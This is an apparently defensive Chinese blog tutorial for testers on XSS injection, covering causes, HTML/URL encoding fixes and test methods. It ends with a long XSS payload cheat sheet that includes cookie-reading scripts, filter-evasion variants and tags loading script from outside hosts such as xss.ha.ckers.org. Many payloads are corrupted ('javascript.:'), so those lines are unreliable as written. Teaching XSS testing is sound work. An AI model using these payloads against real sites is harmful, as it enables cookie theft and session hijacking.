XSS注入测试

最新推荐文章于 2025-05-10 10:58:12 发布
最新推荐文章于 2025-05-10 10:58:12 发布
阅读量4.9w 收藏 125
点赞数 16
分类专栏: 测试开发

XSS 全称(Cross Site Scripting) 跨站脚本攻击, 是Web程序中最常见的漏洞。指攻击者在网页中嵌入客户端脚本(例如JavaScript), 当用户浏览此网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的.  比如获取用户的Cookie,导航到恶意网站,携带木马等。作为测试人员,需要了解XSS的原理,攻击场景,如何修复。 才能有效的防止XSS的发生。

 

XSS 是如何发生的呢

假如有下面一个textbox

<input type="text" name="address1" value="value1from">

value1from是来自用户的输入,如果用户不是输入value1from,而是输入 "/><script>alert(document.cookie)</script><!- 那么就会变成

<input type="text" name="address1" value=""/><script>alert(document.cookie)</script><!- ">

嵌入的JavaScript代码将会被执行

或者用户输入的是  "οnfοcus="alert(document.cookie)      那么就会变成 

<input type="text" name="address1" value="" onfocus="alert(document.cookie)">

 事件被触发的时候嵌入的JavaScript代码将会被执行

 攻击的威力,取决于用户输入了什么样的脚本

 

当然用户提交的数据还可以通过QueryString(放在URL中)和Cookie发送给服务器. 例如下图

 

HTML Encode

XSS之所以会发生, 是因为用户输入的数据变成了代码。 所以我们需要对用户输入的数据进行HTML Encode处理。 将其中的"中括号", “单引号”,“引号” 之类的特殊字符进行编码。

在C#中已经提供了现成的方法,只要调用HttpUtility.HtmlEncode("string <scritp>") 就可以了。  (需要引用System.Web程序集)

Fiddler中也提供了很方便的工具, 点击Toolbar上的"TextWizard" 按钮

 

如何测试XSS漏洞

方法一:  查看代码,查找关键的变量,   客户端将数据传送给Web 服务端一般通过三种方式 Querystring, Form表单,以及cookie.  例如在ASP的程序中,通过Request对象获取客户端的变量

<%
strUserCode =  Request.QueryString(“code”);
strUser =  Request.Form(“USER”);
strID =    Request.Cookies(“ID”);
%>

假如变量没有经过htmlEncode处理, 那么这个变量就存在一个XSS漏洞

 方法二: 准备测试脚本

"/><script>alert(document.cookie)</script><!--
<script>alert(document.cookie)</script><!--
"onclick="alert(document.cookie)

 在网页中的Textbox或者其他能输入数据的地方,输入这些测试脚本, 看能不能弹出对话框,能弹出的话说明存在XSS漏洞

 在URL中查看有那些变量通过URL把值传给Web服务器, 把这些变量的值退换成我们的测试的脚本。  然后看我们的脚本是否能执行

方法三:  自动化测试XSS漏洞
现在已经有很多XSS扫描工具了。 实现XSS自动化测试非常简单,只需要用HttpWebRequest类。 把包含xss 测试脚本。发送给Web服务器。 然后查看HttpWebResponse中,我们的XSS测试脚本是否已经注入进去了。

 

HTML Encode 和URL Encode的区别

关于URL 编码是为了符合url的规范。因为在标准的url规范中中文和很多的字符是不允许出现在url中的。

例如在baidu中搜索"测试汉字"。 URL会变成

http://www.baidu.com/s?wd=%B2%E2%CA%D4%BA%BA%D7%D6&rsv_bp=0&rsv_spt=3&inputT=7477

所谓URL编码就是: 把所有非字母数字字符都将被替换成百分号(%)后跟两位十六进制数,空格则编码为加号(+

在C#中已经提供了现成的方法,只要调用HttpUtility.UrlEncode("string <scritp>") 就可以了。  (需要引用System.Web程序集)

Fiddler中也提供了很方便的工具, 点击Toolbar上的"TextWizard" 按钮

 

浏览器中的XSS过滤器

为了防止发生XSS, 很多浏览器厂商都在浏览器中加入安全机制来过滤XSS。 例如IE8,IE9,Firefox, Chrome. 都有针对XSS的安全机制。 浏览器会阻止XSS。 例如下图

如果需要做测试, 最好使用IE7。

 

XSS注入常用语句

  • <script>alert('hello,gaga!');</script> //经典语句,哈哈!
  • >"'><img src="javascript.:alert('XSS')">
  • >"'><script>alert('XSS')</script>
  • <table background='javascript.:alert(([code])'></table>
  • <object type=text/html data='javascript.:alert(([code]);'></object>
  • "+alert('XSS')+"
  • '><script>alert(document.cookie)</script>
  • ='><script>alert(document.cookie)</script>
  • <script>alert(document.cookie)</script>
  • <script>alert(vulnerable)</script>
  • <s&#99;ript>alert('XSS')</script>
  • <img src="javas&#99;ript:alert('XSS')">
  • %0a%0a<script>alert(\"Vulnerable\")</script>.jsp
  • %3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
  • %3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
  • %3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
  • <script>alert('Vulnerable')</script>
  • a.jsp/<script>alert('Vulnerable')</script>
  • "><script>alert('Vulnerable')</script>
  • <IMG SRC="javascript.:alert('XSS');">
  • <IMG src="/javascript.:alert"('XSS')>
  • <IMG src="/JaVaScRiPt.:alert"('XSS')>
  • <IMG src="/JaVaScRiPt.:alert"(&quot;XSS&quot;)>
  • <IMG SRC="jav&#x09;ascript.:alert('XSS');">
  • <IMG SRC="jav&#x0A;ascript.:alert('XSS');">
  • <IMG SRC="jav&#x0D;ascript.:alert('XSS');">
  • "<IMG src="/java"\0script.:alert(\"XSS\")>";'>out
  • <IMG SRC=" javascript.:alert('XSS');">
  • <SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
  • <BODY BACKGROUND="javascript.:alert('XSS')">
  • <BODY ONLOAD=alert('XSS')>
  • <IMG DYNSRC="javascript.:alert('XSS')">
  • <IMG LOWSRC="javascript.:alert('XSS')">
  • <BGSOUND SRC="javascript.:alert('XSS');">
  • <br size="&{alert('XSS')}">
  • <LAYER SRC="http://xss.ha.ckers.org/a.js"></layer>
  • <LINK REL="stylesheet"HREF="javascript.:alert('XSS');">
  • <IMG SRC='vbscript.:msgbox("XSS")'>
  • <META. HTTP-EQUIV="refresh"CONTENT="0;url=javascript.:alert('XSS');">
  • <IFRAME. src="/javascript.:alert"('XSS')></IFRAME>
  • <FRAMESET><FRAME. src="/javascript.:alert"('XSS')></FRAME></FRAMESET>
  • <TABLE BACKGROUND="javascript.:alert('XSS')">
  • <DIV STYLE="background-image: url(javascript.:alert('XSS'))">
  • <DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html&#39;);">
  • <DIV STYLE="width: expression(alert('XSS'));">
  • <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
  • <IMG STYLE='xss:expre\ssion(alert("XSS"))'>
  • <STYLE. TYPE="text/javascript">alert('XSS');</STYLE>
  • <STYLE. TYPE="text/css">.XSS{background-image:url("javascript.:alert('XSS')");}</STYLE><A CLASS=XSS></A>
  • <STYLE. type="text/css">BODY{background:url("javascript.:alert('XSS')")}</STYLE>
  • <BASE HREF="javascript.:alert('XSS');//">
  • getURL("javascript.:alert('XSS')")
  • a="get";b="URL";c="javascript.:";d="alert('XSS');";eval(a+b+c+d);
  • <XML SRC="javascript.:alert('XSS');">
  • "> <BODY NLOAD="a();"><SCRIPT>function a(){alert('XSS');}</SCRIPT><"
  • <SCRIPT. SRC="http://xss.ha.ckers.org/xss.jpg"></SCRIPT>
  • <IMG SRC="javascript.:alert('XSS')"
  • <SCRIPT. a=">"SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
  • <SCRIPT.=">"SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
  • <SCRIPT. a=">"''SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
  • <SCRIPT."a='>'"SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
  • <SCRIPT>document.write("<SCRI");</SCRIPT>PTSRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
  • <A HREF=http://www.gohttp://www.google.com/ogle.com/>link</A>

参考文章:

http://www.51testing.com/html/93/316693-814899.html

https://www.cnblogs.com/TankXiao/archive/2012/03/21/2337194.html

【漏洞挖掘】——161、输入输出之XSS注入测试
Fly_鹏程万里
09-10 320
跨站脚本漏洞是Web应用程序在将数据输出到网页的时候存在问题,导致恶意攻击者可以往Web页面里插入恶意JavaScript、HTML代码并将构造的恶意数据显示在页面的漏洞中,攻击者一般利用此漏洞窃取或操纵客户会话和Cookie,用于模仿合法用户,从而使攻击者以该用户身份查看或变更用户记录以及执行事务。
XSS 漏洞检测与利用
最新发布
rasssel的博客
07-11 566
是指攻击者在网页中注入恶意脚本,当其他用户访问页面时,这段脚本将在他们的浏览器中执行。收集目标 URL 接口及参数构造并注入 Payload观察响应内容 & JS 执行效果根据响应位置构造上下文闭合 Payload尝试不同的绕过技巧(编码、双写、标签替代等)使用自动化工具辅助批量检测。
网络渗透测试实验三 XSS和SQL注入
taoze7892203的博客
12-01 663
实验目的:了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。系统环境:Kali Linux 2、Windows Server网络环境:交换网络结构实验工具: Beef;SqlMAP;DVWA角色:留言簿网站。存在XSS漏洞;(IIS或Apache、guestbook搭建)攻击者:Kali(使用beEF生成恶意代码,并通过留言方式提交到留言簿网站);
XSS注入(1)-两个简单测试理解反射型xss注入和存储型xss注入
妙蛙种子吃了都会妙妙秒的妙脆角的博客
02-28 7687
XSS注入(1)-两个例子理解反射型xss注入和存储型xss注入 XSS全称 Cross Site Script,为使与css语言重名,所以我们将其称为xss跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意脚本代码,而程序对于用户输入内容未过滤,当用户浏览该页之时,嵌入其中Web里面的脚本代码会被执行,从而达到恶意攻击用户的特殊目的。 xss的分类主要有:反射型XSS、存储型XSS、DOM型XSS。有时也会将DOM型归于反射型XSS中,所以我们经常将xss分为反射型XSS和存储型XSS两大类。 一
Web渗透之XSS注入
zj2084的博客
04-12 1258
我们构建好一个urlXSS的payload,发送给受害者,受害者点击恶意链接后会在受害者的浏览器上执行恶意代码。反射型XSS是一次性的,而且比较容易被发现。通常恶意链接会被修改成短链接,或钓鱼图片的形式。
【渗透测试-web安全】XSS注入
harry_c的博客
10-10 849
【渗透测试-web安全】XSS注入基本分类存储型XSS反射型XSSDOM型XSS总结 基本分类 存储型XSS 反射型XSS DOM型XSS 存储型XSS 黑客在前端写入XSS到数据库–>用户进行web访问–>向服务器请求数据–>返回带XSS脚本的数据–>前端出发XSS 注意事项:一般通过将携带XSS的数据写入到数据库中,比如留言功能中构造对应的XSS,或者通过其他的形式写...
WEB漏洞之XSS注入解析
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
11-05 1289
因此,不建议在URL中使用锚点注入来执行JavaScript代码,而应该使用更安全的方法,如在HTML文档中嵌入JavaScript代码或在外部JavaScript文件中编写代码。所以:document.location.href.indexOf("default=") 的作用就是检索:default= 第一次出现的位置,如果检索的字符串值没有出现,则该方法返回 -1 ,(没有是:=== -1;如果浏览器支持锚点注入,那么在URL的井号后面添加JavaScript脚本是可以运行的。
XSS和sql注入部分场景测试用例样例
m0_37570494的博客
09-07 1026
XSS 攻击通常是通过输入字段插入恶意的 JavaScript 代码,试图执行客户端脚本。设计这些测试用例时,需要涵盖常见的 XSS 攻击手段。SQL 注入攻击通常通过在输入字段中插入恶意 SQL 代码,试图操纵数据库查询。设计这些测试用例时,需要涵盖各种常见的 SQL 注入技术。
XSS注入
Pudding_2024的博客
05-10 2263
跨站脚本(Cross-Site Scripting,XSS/CSS)是一种经常出现在Web应用程序中的计算机安全漏洞,是由于Web应用程序对用户的输入过滤不足而产生的。攻击者利用网站漏洞把恶意的脚本代码(通常包括HTML代码和客户端javascript脚本)注入到网页之中,当其他用户浏览这些网页时,就会执行其中的恶意代码,对受害者可能采取Cookie资料窃取、会话劫持、钓鱼欺骗等各种攻击。本质:前端代码注入XSS的分类1、反射型XSS
xss-labs-master.zip(xss注入通关游戏/靶场)
03-21
`xss-labs-master.zip`包含了一个专门用于学习和实践XSS注入的通关游戏或靶场,对于网络安全测试人员来说,这是一个极好的学习资源。 **XSS分类** 1. **存储型XSS**:也称为持久型XSS,攻击者将恶意脚本存入服务器...
xss注入讲解ppt.pptx
08-10
xss 注入讲解ppt xss 是一种常见的 web 应用安全漏洞,能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,从而达到恶意攻击用户的目的。xss 可以追溯到上世纪 90 年代,已经超过缓冲区溢出成为最流行的...
SQL注入用例及XSS用例
05-05
安全测试,SQL注入方面的用例及XSS的操作用例
测试脚本注入.docx
09-06
测试脚本注入
渗透测试——漏洞扫描工具
wuli1024的博客
11-20 2981
然后还要将all这个压缩包里的plugin_feed_info.inc提取出来,命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc,然鹅,我提取不出来。将下载好的插件移动到Nessus目录下,然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名和密码随便写写就好,随后将会更新补丁,OK,这样Nessus可以使用了。将会获得一串数字,然后去激活码的这个网站,输入自己的邮箱获取激活码。
一次利用XSS读取源码和Nosql注入渗透测试
A1_3_9_7的博客
05-10 1013
常规的XSS利用方式主要有窃取cookie、恶意链接、获取键盘记录、网页钓鱼、挂马等等,本次渗透首先通过XSS漏洞,利用XMLRequest发起ajax请求,实现了发起http请求的目的,并且把请求的结果返回了,通过代码审计,打开了突破的口子。后续还运用到了Nosql注入、绕过2FA验证、kdbx文件解密等等技术,渗透过程涉及很多小的知识点,充满乐趣与挑战,下面开始此次渗透之旅。
网络渗透测试实验三之XSS和SQL注入
weixin_47356546的博客
12-25 678
实验二 网络嗅探与身份认证 提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二
靶场——XSS注入
newqian的博客
08-17 1146
【代码】八月十六日。
xss注入
04-02
### XSS注入攻击原理 XSS(Cross-Site Scripting)是一种常见的网络安全威胁,它允许攻击者向受害者的浏览器注入恶意脚本。这种攻击通常利用了Web应用程序未能正确处理用户输入的缺陷[^1]。 #### 攻击分类 XSS攻击主要分为三种类型: 1. **反射型XSS** 反射型XSS是最常见的一种形式,其中攻击者通过诱导用户点击含有恶意脚本链接的方式,在用户的浏览器中执行代码。这种方式不会永久保存在目标服务器上,而是依赖于用户的行为触发[^3]。 2. **存储型XSS** 存储型XSS是指恶意脚本被持久化存储在目标服务器数据库中,当其他用户访问受影响的内容时,脚本会在他们的浏览器中自动运行。这类攻击的危害更大,因为它不需要额外的操作即可影响多个用户[^2]。 3. **DOM-based XSS** 这种类型的XSS发生在客户端JavaScript操作DOM的过程中,即使服务端未返回任何有害数据,也可能因前端逻辑错误而导致攻击成功。 --- ### XSS注入攻击的目的 攻击者实施XSS攻击的主要目的是窃取敏感信息并操控用户体验。具体来说,可能造成以下后果: - 窃取用户的Cookie,从而冒充合法身份登录网站[^4]。 - 修改页面内容,欺骗用户提交账户密码或其他隐私数据[^5]。 - 插入广告或恶意软件下载链接,损害品牌形象并牟利。 --- ### 防护措施 为了有效抵御XSS攻击,可以从以下几个方面入手: 1. **输入验证与过滤** 对所有来自外部的数据进行全面校验,拒绝非法字符序列进入系统。例如,移除`<`, `>`, `&`等特殊符号以避免它们被解释成HTML标记。 2. **输出编码** 当动态生成HTML响应时,应确保将变量中的潜在危险字符转换为其对应的实体表示法。以下是几种常用的编码方式: - HTML编码:用于常规文本展示场景下的安全性增强。 ```python import html safe_text = html.escape(user_input) ``` - JavaScript编码:适用于嵌套Script标签内部的情况。 - URL编码:针对URL参数部分的安全保障机制。 ```python from urllib.parse import quote_plus encoded_url_param = quote_plus(user_input) ``` 3. **HTTP头配置优化** 利用现代浏览器提供的功能来减少风险暴露面。推荐启用以下头部字段: - 设置`Content-Security-Policy (CSP)`声明白名单资源加载路径,阻止未经授权的脚本执行。 ```http Content-Security-Policy: script-src 'self' ``` - 启用`X-XSS-Protection`选项,默认情况下激活内置防护引擎。 ```http X-XSS-Protection: 1; mode=block ``` 4. **会话管理加强** 使用HttpOnly标志附加至Cookies之上,使得JavaScript无法读取相关内容;同时配合Secure属性限定仅HTTPS协议下传输。 --- ### 总结 通过对上述理论和技术手段的学习应用,能够显著降低遭受XSS攻击的可能性。然而需要注意的是,随着技术发展新型变体可能会不断涌现出来,因此持续关注最新研究成果以及官方补丁更新同样重要。
评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值